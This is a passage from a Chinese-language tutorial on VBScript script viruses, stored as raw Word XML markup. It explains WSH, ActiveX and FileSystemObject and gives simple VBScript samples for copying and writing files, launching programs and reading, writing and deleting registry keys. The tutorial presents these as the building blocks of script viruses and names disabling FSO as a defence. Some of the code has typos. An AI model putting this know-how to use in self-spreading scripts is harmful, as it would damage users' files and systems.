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93D" w:rsidRDefault="00D67CD3" w:rsidP="00E14C22">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本(Script)病毒是以脚本程序(如VBScript、JavaScript、PHP)编写成的病毒。实际上，任何语言都可以编写病毒，而用脚本编写病毒则更加的简单，并且编写的病毒具有传播快、破坏力大等特点。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE47AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，爱虫病毒、欢乐时光病毒等，就是利用VBS（VBScript）编写的，称为VBS脚本病毒。万花谷病毒就是利用JS（JavaScript）编写的。脚本病毒必须透过Microsoft的WSH才能够启动执行以及感染其他文件。由于VBS脚本病毒比较普遍且危害较大，所以这里主要就以VBS来介绍脚本病毒。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00164F64" w:rsidRDefault="00BD1EE2" w:rsidP="00164F64">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一、</w:t>
      </w:r>
      <w:r w:rsidR="00164F64">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3793D" w:rsidRPr="00D3793D" w:rsidRDefault="00D67CD3" w:rsidP="00164F64">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="28"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D3793D">
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="28"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>WSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D3793D" w:rsidP="00D3793D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>SH</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（服务器端）</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3" w:rsidRPr="004323D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是Windows Scripting Host（Windows脚本宿主）的缩略形式。</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3" w:rsidRPr="004323D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于32位的Windows平台并独立于语言的脚本运行环境</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3" w:rsidRPr="004323D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个批次语言/自动执行工具。</w:t>
      </w:r>
      <w:r w:rsidR="00D67CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后缀名为.vbs或js的脚本文件，在Windows下运行它时，系统就会自动调用一个适当的程序对它进行解释执行，而这个程序就是WScript.exe（如果是在DOS环境下，则为CScript.exe，命令格式为：Cscript FileName.vbs）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3793D" w:rsidRDefault="00D3793D" w:rsidP="00164F64">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004323D7">
        <w:t>ActiveX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D3793D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="004323D7">
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（客户端）是Microsoft提出的一组使用COM（Component Object Model，部件对象模型）使得软件部件在网络环境中进行交互的技术集。它与具体的编程语言无关。作为针对Internet应用开发的技术，ActiveX被广泛应用于WEB服务器以及客户端的各个方面。同时，ActiveX技术也被用于方便地创建普通的桌面应用程序。ActiveX既包含服务器端技术，也包含客户端技术。其主要内容是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0041561C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActiveX控制（ActiveX Control）；用于向WEB页面、Microsoft Word等支持ActiveX的容器（Container）中插入COM对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0041561C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActiveX文档（ActiveX Document）；用于在WEB Browser或者其它支持ActiveX的容器中浏览复合文档（非HTML文档），例如Microsoft Word文档，Microsoft Excel文档或者用户自定义的文档等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0041561C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActiveX脚本描述（ActiveX Scripting）；用于从客户端或者服务器端操纵 ActiveX控制和Java程序，传递数据，协调它们之间的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0041561C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveX服务器框架（ActiveX Server Framework）；提供了一系列针对WEB服务器应用程序设计各个方面的函数及其封装类，诸如服务器过滤器、HTML数据流控制等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3793D" w:rsidRDefault="00D3793D" w:rsidP="00164F64">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>SO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D3793D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>File System Object（服务器端）简称FSO。是微软ASP的一个对文件操作的控件，该控件可以对服务器进行读取、新建、修改、删除目录以及文件的操作。但是因为权限控制的问题，很多虚拟主机服务器的FSO反而成为这台服务器的一个公开的后门，因为客户可以在自己的ASP网页里面直接就对该控件编程，从而控制该服务器甚至删除服务器上的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>详情：A</w:t>
      </w:r>
      <w:r>
        <w:t>SP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC7907" w:rsidRDefault="00CC7907" w:rsidP="00CC7907">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D67CD3" w:rsidRPr="00CC7907" w:rsidRDefault="00D67CD3" w:rsidP="00D67CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7907">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>WSH构架于ActiveX之上，通过充当ActiveX的脚本引擎控制器，为Windows用户充分利用威力强大的脚本指令语言扫清障碍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00736DF3" w:rsidRDefault="00C359B5" w:rsidP="00C359B5">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r w:rsidR="00736DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00736DF3">
        <w:t>SH</w:t>
      </w:r>
      <w:r w:rsidR="00736DF3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00736DF3" w:rsidRDefault="00736DF3" w:rsidP="00736DF3">
      <w:r>
        <w:t>Set fso=CreatObject("Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00736DF3" w:rsidRDefault="00736DF3" w:rsidP="00736DF3">
      <w:r>
        <w:t>fso.GetFile("C:\Hello.txt").Copy("H:\HelloWorld.txt")</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>//假设C盘根目录存在文件Hello.txt,否则上一行就运行时出错</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B48B0" w:rsidRDefault="007B48B0" w:rsidP="007B48B0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就这两行就可以完成拷贝文件到制定地点，并重命名。第一行创建一个文件系统对象（</w:t>
      </w:r>
      <w:r>
        <w:t>File System Object FSO），第二行利用这个文件系统对象获取目标文件，即C:\Hello.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指明的文件，是一个完整的路径文件名。</w:t>
      </w:r>
      <w:r>
        <w:t>GetFile函数获得</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个文件，Copy函数将这个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制到</w:t>
      </w:r>
      <w:r>
        <w:t>H盘并重命名。这也是用VBScript编写病毒的一个显著特点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00260E5A">
      <w:r w:rsidRPr="00260E5A">
        <w:rPr>
          <w:rStyle w:val="a9"/>
        </w:rPr>
        <w:t>例</w:t>
      </w:r>
      <w:r w:rsidRPr="00260E5A">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1（访问文件系统）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>WScript.Echo("利用WSH访问文件系统")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>dim objDir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="004D0073">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set objDir=WScript.Createobjec</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:t>t("Scripting.FileSystemObject")</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//使用FSO对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>For k=1 to 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sNewFolder="H:\WshSample" </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//给新的文件夹命名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="004D0073">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set objShell=WScrip</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:t>t.CreateObject("Wscript.Shell")</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//启动shell对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="004D0073">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>objShell.Run("n</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:t>otepad"&amp;WScript.ScriptFullName)</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//用shell对象启动记事本，并打开脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set fso=WScript.CreateObject("Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="004D0073">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>set tsObj=fso.CreateT</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:t>extFile("C:\TestFile.txt",True)</w:t>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004D0073">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>//在C盘根目录下创建一个文本文件TestFile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tsObj.WriteLine("利用WSH访问文件夹系统")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE6DF3" w:rsidRDefault="00EE6DF3" w:rsidP="00EE6DF3">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>tsObj.Close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008337ED" w:rsidRDefault="008337ED" w:rsidP="008337ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果禁止了</w:t>
      </w:r>
      <w:r>
        <w:t>FileSystemObject那么就可以有效的控制这种病毒</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的传播。用</w:t>
      </w:r>
      <w:r>
        <w:t>RegSvr32 scrrun.DLL /u这条命令就可以禁止文件系统对象。如果禁止了文件系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统对象，那么在执行代码的时候就会出现错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008337ED" w:rsidRPr="00085EFD" w:rsidRDefault="008337ED" w:rsidP="00260E5A">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00085EFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例2（访问注册表）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008337ED" w:rsidRDefault="008337ED" w:rsidP="008337ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>VBScript访问注册表，必须先创建一个能与操作系统沟通的对象，再利用这个对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各种方法对注册表进行操作，创建这个对象的方法和格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008337ED" w:rsidRPr="008337ED" w:rsidRDefault="008337ED" w:rsidP="008337ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008337ED">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Set 对象变量名=Wscript.CreateObject("Wscript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008337ED" w:rsidRDefault="00085EFD" w:rsidP="008337ED">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="008337ED">
        <w:t>Set regWsh=Wscript.CreateObject("Wscript.Shell")就可以创建一个名为regWsh的对</w:t>
      </w:r>
      <w:r w:rsidR="008337ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>象了。有了这个对象，还要用到几个重要的方法才能够达到访问注册表的目的。常用的方法有以下几种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085EFD" w:rsidRDefault="00085EFD" w:rsidP="00085EFD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读注册表键值的操作</w:t>
      </w:r>
      <w:r>
        <w:t>RegRead。格式为：regWsh.RegRead(路径参数)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085EFD" w:rsidRDefault="00085EFD" w:rsidP="006E352D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:t>/修改注册表键值的操作RegWrite。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式为：</w:t>
      </w:r>
      <w:r>
        <w:t>regWsh.RegWrite 路径参数,值[,值类型]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085EFD" w:rsidRDefault="00085EFD" w:rsidP="006E352D">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：当被操作的“路径参数”不存在时，创建该主键或键值；反之，则修改原有的键值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="002627A0">
      <w:pPr>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD4798">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2"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>③</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00085EFD">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00085EFD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除注册表键值的操作</w:t>
      </w:r>
      <w:r w:rsidR="00085EFD">
        <w:t>RegDelete。格式为regWsh.RegDelete 路径参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。路径参数指出了操作的对象，有根键、主键路径和键值三部分组成，各部分表示的的方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00CD4798">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="780" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1）根键。根键有两种表示方法：缩写形式</w:t>
      </w:r>
      <w:r>
        <w:t>(Short)和完整形式(Long)，相互对应关系如表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="aa"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1129" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="3117"/>
        <w:gridCol w:w="2270"/>
        <w:gridCol w:w="3112"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidTr="002627A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缩写形式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>完整形式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>缩写形式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>完整形式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidTr="002627A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKCU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKEY_CURRENT_USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2270" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3112" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKEY_USERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidTr="002627A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKLM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD4798" w:rsidRPr="00CD4798" w:rsidRDefault="00CD4798" w:rsidP="00F61D65">
            <w:r w:rsidRPr="00CD4798">
              <w:t>HKEY_LOCAL_MACHINE</w:t>
            </w:r>
          </w:p>
